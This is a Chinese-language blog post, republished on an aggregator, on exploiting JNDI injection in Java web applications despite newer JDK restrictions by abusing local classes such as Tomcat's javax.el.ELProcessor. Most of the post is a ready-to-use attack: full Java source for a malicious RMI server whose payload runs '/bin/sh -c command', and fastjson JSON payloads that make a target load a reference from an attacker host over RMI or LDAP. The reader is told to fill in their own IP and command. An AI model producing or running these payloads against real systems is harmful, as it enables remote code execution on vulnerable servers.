美文网首页
利用本地类突破JDK高版本限制进行JNDI注入

利用本地类突破JDK高版本限制进行JNDI注入

作者: 清水川崎 | 来源:发表于2019-08-28 11:23 被阅读0次

    前言

    一般情况下,我们在进行JNDI注入时会参考JDK的版本限制,具体的修复可以参考下图

    JDK对于JNDI注入的修复

    但如果JDK大于图中版本时,就不能进行JNDI注入了吗?答案不是的

    触发情况

    • 1.JDK >上图版本
    • 2.Web Application use Tomcat || IBM WebSphere && can use LDAP | RMI

    Payload

    1.恶意RMI服务器

    使用如下代码搭建恶意的RMI服务器

    import java.rmi.registry.*;
import com.sun.jndi.rmi.registry.*;
import javax.naming.*;
import org.apache.naming.ResourceRef;

public class EvilRMIServerNew {
    public static void main(String[] args) throws Exception {
        String vpsip = "your vpsip" ;
        System.out.println("Creating evil RMI registry on port 1097");
        System.setProperty("java.rmi.server.hostname",vpsip);
        Registry registry = LocateRegistry.createRegistry(1097);

        ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
        ref.add(new StringRefAddr("forceString", "x=eval"));
        ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','command']).start()\")"));

        ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref);
        registry.bind("ExportObject", referenceWrapper);
    }
}

    你只需要修改vpsip为你的ip,且修改command为你要执行的命令即可

    随后在webapp调用rmi服务即可,例如fastjson(利用tomcat的本地类)

    {
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://vpsip:1097/ExportObject",
        "autoCommit":true
    }

}
    Exploit示例 执行firefox举例

    2.恶意LDAP服务器

    本来准备自己写一个的,在逛github时偶然发现了一个轮子

    Rogue JNDI

    使用它可以搭建基于LDAP恶意服务器合集

    LDAP恶意服务器合集

    我们还是以fastjson为攻击目标举例,这回我们把JDK换成JDK8U211

    tomcat

    我们构造好payload进行攻击(利用tomcat的本地类)

    {
    "name":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "x":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://vpsip:1389/o=tomcat",
        "autoCommit":true
    }

}

    可见已经弹出Firefox,攻击成功

    弹出Firefox 攻击成功

    关于tomcat

    由于tomcat7并不含有javax.el.E​​LProcessor类,而tomcat8含有

    javax.el.E​​LProcessor

    由此得知tomcat7无法触发.

    已知可利用的本地类

    Tomcat ----> javax.el.ELProcessor
    IBM WebSphere ----> com.ibm.ws.webservices.engine.client.ServiceFactory || com.ibm.ws.client.applicationclient.ClientJ2CCFFactory

    利用上面的已知类你可以自定义想要的RMI恶意服务器

    Reference

    Exploiting JNDI Injections in Java:
    https://www.veracode.com/blog/research/exploiting-jndi-injections-java
    rogue-jndi:
    https://github.com/veracode-research/rogue-jndi

    相关文章

      网友评论

          本文标题:利用本地类突破JDK高版本限制进行JNDI注入

          本文链接:https://www.haomeiwen.com/subject/lglpectx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|利用本地类突破JDK高版本限制进行JNDI注入|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!